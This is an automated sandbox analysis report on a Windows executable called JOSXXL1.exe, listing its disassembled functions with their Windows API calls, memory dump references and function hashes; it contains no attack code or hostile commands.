                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2547128583-0
                                                                                                        • Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                        • Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
                                                                                                        • Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                        • Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D
                                                                                                        Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$EnableShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1136574915-0
                                                                                                        • Opcode ID: 9fe90b50c1299fe4fda6fea10b77ea4039d57455645490fd416540ed0fe32fde
                                                                                                        • Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
                                                                                                        • Opcode Fuzzy Hash: 9fe90b50c1299fe4fda6fea10b77ea4039d57455645490fd416540ed0fe32fde
                                                                                                        • Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D
                                                                                                        Function 00405D58 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405D5C
                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 415043291-0
                                                                                                        • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                        • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                        • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                        • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                        Function 00405D33 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00405938,?,?,00000000,00405B0E,?,?,?,?), ref: 00405D38
                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D4C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                        • Instruction ID: bbac5bc73aa77dea78574471440e90d8105817861fa72b5948562f5081259be0
                                                                                                        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                        • Instruction Fuzzy Hash: 1CD0C976504520ABC2112728AE0C89BBB55EB54371B028B35FAA9A22B0CB304C568A98
                                                                                                        Function 0040582E Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405834
                                                                                                        • GetLastError.KERNEL32 ref: 00405842
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1375471231-0
                                                                                                        • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                        • Instruction ID: 106bcc9dbfec6d9c4c73fbe0ebad0997e3226ea8ec62ae9f19e78208b048f617
                                                                                                        • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                        • Instruction Fuzzy Hash: C9C04C31204A019AD6606B209F09B177954EB50741F1184396946E00A0DB348425DE2D
                                                                                                        Function 00405E0A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00412514,0040CEF0,004032EF,0040CEF0,00412514,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                        • Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
                                                                                                        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                        • Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4
                                                                                                        Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000122,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Open
                                                                                                        • String ID:
                                                                                                        • API String ID: 71445658-0
                                                                                                        • Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                        • Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
                                                                                                        • Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                        • Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69
                                                                                                        Function 00405DDB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                        • Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
                                                                                                        • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                        • Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4
                                                                                                        Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 544645111-0
                                                                                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                        • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                        • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                        Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: c4528ff674870a17743e7c966ff3c37f2ecf4e92b6133aa71faff386c44fe70c
                                                                                                        • Instruction ID: ca47bcbc6672940417f4f3661b4a0bb48d49598efcfee23ab0cca25c35b9ec2b
                                                                                                        • Opcode Fuzzy Hash: c4528ff674870a17743e7c966ff3c37f2ecf4e92b6133aa71faff386c44fe70c
                                                                                                        • Instruction Fuzzy Hash: 00D05B33704100D7CB10DFE89F0869D77759B40334B208177D501F21E4D6B9C5519B1D
                                                                                                        Function 00404293 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                        • Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
                                                                                                        • Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                        • Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D
                                                                                                        Function 0040336E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2317487166.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317539116.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317554373.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2317686266.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 973152223-0
                                                                                                        • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                        • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
